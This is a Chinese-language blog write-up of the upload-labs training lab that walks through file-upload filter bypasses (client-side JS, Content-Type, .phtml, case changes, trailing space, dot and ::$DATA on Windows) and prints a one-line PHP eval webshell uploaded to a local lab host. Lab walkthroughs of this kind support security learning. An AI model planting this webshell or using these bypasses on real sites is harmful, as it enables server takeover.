基本把代码的意思都写入注释中了，我之前博客写的，图可能不是太清晰，也可以去我之前博客看
1.Js绕过

webshell<?php @eval($_POST[margin])?>;

直接function改成return true

2.Content-type绕过

稍微改一下就可以了

3.phtml上传绕过
这一关没什么可说的，算是钻了apahce的一个空子吧

简单的一个黑名单的方式，但是利用了apahce的解析

在http.conf文件的第403行，这里直接会把phtml文件当作php代码来执行，其实你在这后面加个.txt，他都能给你当作php来执行
5 大小写绕过

成功绕过，这种黑名单方式不是很好，，建议白名单

6 后缀加空格绕过

可以看到源代码中并没有对空格做限制，windows中一个特性，加一个空格他会自动给你删除掉，加空格并不影响上述文件的一系列操作

木马上传成功

7.后缀加点绕过
同样是windows的特性

http://192.168.1.4/upload-labs/upload/7.php.
已经上传成功了

在upload目录下看到的7.php其实是不带.的原因是在windows中的特性，把点取消了

8. 后缀加::$DATA绕过
   

在前面的代码基础上增加了 首尾去空，那么加空格绕过就不行了

: